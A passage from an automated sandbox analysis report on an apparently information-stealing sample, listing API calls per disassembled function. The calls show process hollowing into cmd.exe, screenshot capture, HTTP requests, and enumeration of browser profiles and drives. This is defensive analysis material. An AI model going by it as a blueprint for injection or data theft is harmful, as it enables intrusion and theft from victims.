                                                                                                                  • LeaveCriticalSection.KERNEL32(6C6BF688), ref: 6C633801
                                                                                                                  • __aulldiv.LIBCMT ref: 6C633883
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C633902
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C633918
                                                                                                                  • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C63394C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492468765.000000006C631000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C630000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492448452.000000006C630000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                  • Associated: 00000004.00000002.2492833314.000000006C6AD000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                  • Associated: 00000004.00000002.2492911108.000000006C6BE000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                  • Associated: 00000004.00000002.2492934435.000000006C6C2000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c630000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                  • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                  • API String ID: 301339242-3790311718
                                                                                                                  • Opcode ID: f6f0c7e450ea9e8e745ab1906fede0997ff620cc8483bdbdbbc403b648ad2a43
                                                                                                                  • Instruction ID: abe4a13f4a6cecad22fc34432b1de187c243941eefd580eacf12b38e1c967f79
                                                                                                                  • Opcode Fuzzy Hash: f6f0c7e450ea9e8e745ab1906fede0997ff620cc8483bdbdbbc403b648ad2a43
                                                                                                                  • Instruction Fuzzy Hash: 44B1D879B083119FDB08DF2AC49561A77F5FB8A700F04993EE899D3760E77098118B8E

                                                                                                                  Control-flow Graph

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                  • String ID: %s\%s$%s\%s$%s\*
                                                                                                                  APIs
                                                                                                                  • __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                                  • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                                    • Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                                    • Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                                    • Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                                    • Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
                                                                                                                    • Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                                    • Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041191D
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0041195C
                                                                                                                  • wsprintfA.USER32 ref: 00411949
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                  • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: /$UT
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                    • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                    • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                  • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00406B50
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00406B5C
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00406B68
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                  • String ID: ERROR$ERROR$GET
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 0040F57C
                                                                                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,004365A7,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040F5A0
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0040F5B2
                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0040F5C4
                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F5E2
                                                                                                                  • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040F5F8
                                                                                                                  • ResumeThread.KERNEL32(?), ref: 0040F608
                                                                                                                  • WriteProcessMemory.KERNEL32(?,00000000,a-A,?,00000000), ref: 0040F627
                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0040F65D
                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F684
                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0040F696
                                                                                                                  • ResumeThread.KERNEL32(?), ref: 0040F69F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$MemoryThread$Write$AllocContextResumeVirtualWow64$CreateRead_memset
                                                                                                                  • String ID: C:\Windows\System32\cmd.exe$a-A
                                                                                                                  APIs
                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
                                                                                                                  • GetDesktopWindow.USER32 ref: 00411FA4
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00411FB1
                                                                                                                  • GetDC.USER32(00000000), ref: 00411FB8
                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00411FDE
                                                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
                                                                                                                  • GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
                                                                                                                  • GlobalLock.KERNEL32(?), ref: 00412052
                                                                                                                  • GlobalSize.KERNEL32(?), ref: 0041205E
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                    • Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                                    • Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                  • SelectObject.GDI32(?,?), ref: 004120BC
                                                                                                                  • DeleteObject.GDI32(?), ref: 004120D7
                                                                                                                  • DeleteObject.GDI32(?), ref: 004120E0
                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 004120E8
                                                                                                                  • CloseWindow.USER32(00000000), ref: 004120EF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2610876673-0
                                                                                                                  • Opcode ID: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                                                  • Instruction ID: f6e3f0428e96004f8b83f7710fafbd9962f3d673da3a1d35a18d8dcfea6c860f
                                                                                                                  • Opcode Fuzzy Hash: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                                                  • Instruction Fuzzy Hash: 0251EA72800218AFDF15EFA1ED498EE7FBAFF08319F045525F901E2120E7369A55DB61
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369FA,004369F7,00417908,?,00000000), ref: 00401FA4
                                                                                                                  • StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
                                                                                                                  • StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
                                                                                                                  • FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369FB), ref: 004020DD
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 004022C3
                                                                                                                    • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 00402336
                                                                                                                  • FindNextFileA.KERNEL32(?,?), ref: 004023A2
                                                                                                                  • FindClose.KERNEL32(?), ref: 004023B6
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 004025DC
                                                                                                                    • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                    • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                    • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                    • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                    • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040264F
                                                                                                                    • Part of subcall function 00416E97: Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                                  • FindNextFileA.KERNEL32(?,?), ref: 004026C6
                                                                                                                  • FindClose.KERNEL32(?), ref: 004026DA
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                    • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                    • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                  • String ID: \*.*
                                                                                                                  • API String ID: 1475085387-1173974218
                                                                                                                  • Opcode ID: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                                  • Instruction ID: 84c523e9d2ff6d0b2cceb644b0baa1646f1dc192954122ea0c18f52f03966360
                                                                                                                  • Opcode Fuzzy Hash: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                                  • Instruction Fuzzy Hash: 6C32EC71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB86FC98F99
                                                                                                                  APIs
                                                                                                                  • wsprintfA.USER32 ref: 0041546A
                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00415481
                                                                                                                  • StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
                                                                                                                  • StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
                                                                                                                  • lstrcatA.KERNEL32(?), ref: 0041550D
                                                                                                                  • lstrcatA.KERNEL32(?), ref: 00415520
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00415534
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00415547
                                                                                                                  • lstrcatA.KERNEL32(?,00436A88), ref: 00415559
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0041556D
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                    • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                    • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                    • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                    • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                    • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                    • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                  • FindNextFileA.KERNEL32(?,?), ref: 00415623
                                                                                                                  • FindClose.KERNEL32(?), ref: 00415637
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                  • String ID: %s\%s
                                                                                                                  • API String ID: 1150833511-4073750446
                                                                                                                  • Opcode ID: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                                                  • Instruction ID: 7b4a02d1ce16c29d0e311cc455c9dd4e2592c9f450b56a316f79c40a9e4a8b0e
                                                                                                                  • Opcode Fuzzy Hash: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                                                  • Instruction Fuzzy Hash: 71515FB190021D9BCF64DF60CC89AC9B7BDAB48305F1045E6E609E3250EB369B89CF65
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
                                                                                                                  • StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
                                                                                                                  • StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
                                                                                                                  • StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
                                                                                                                  • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
                                                                                                                  • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                  • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                  • API String ID: 2567437900-1710495004
                                                                                                                  • Opcode ID: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                                                  • Instruction ID: c4b769843fd96ba5a9993bec0907288b27e6520762e28c1f4f52d27b6ca0eed4
                                                                                                                  • Opcode Fuzzy Hash: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                                                  • Instruction Fuzzy Hash: 0E021D71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3191DBB86FC98F88
                                                                                                                  APIs
                                                                                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
                                                                                                                  • _memset.LIBCMT ref: 004151E5
                                                                                                                  • GetDriveTypeA.KERNEL32(?), ref: 004151EE
                                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0041520E
                                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 00415229
                                                                                                                    • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
                                                                                                                    • Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                                    • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
                                                                                                                    • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
                                                                                                                    • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                                    • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                                    • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
                                                                                                                    • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                                    • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
                                                                                                                    • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
                                                                                                                    • Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 004152C4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                  • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                  • API String ID: 441469471-147700698
                                                                                                                  • Opcode ID: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                                  • Instruction ID: 002cc7b8fd832fc02ac953dee8a9373947a5751985c47ec76440b2e4c0201c02
                                                                                                                  • Opcode Fuzzy Hash: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                                  • Instruction Fuzzy Hash: 1B512DB190021CAFDF219FA1CC85BDA7BB9FB09304F1041AAEA48A7111E7355E89CF59
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
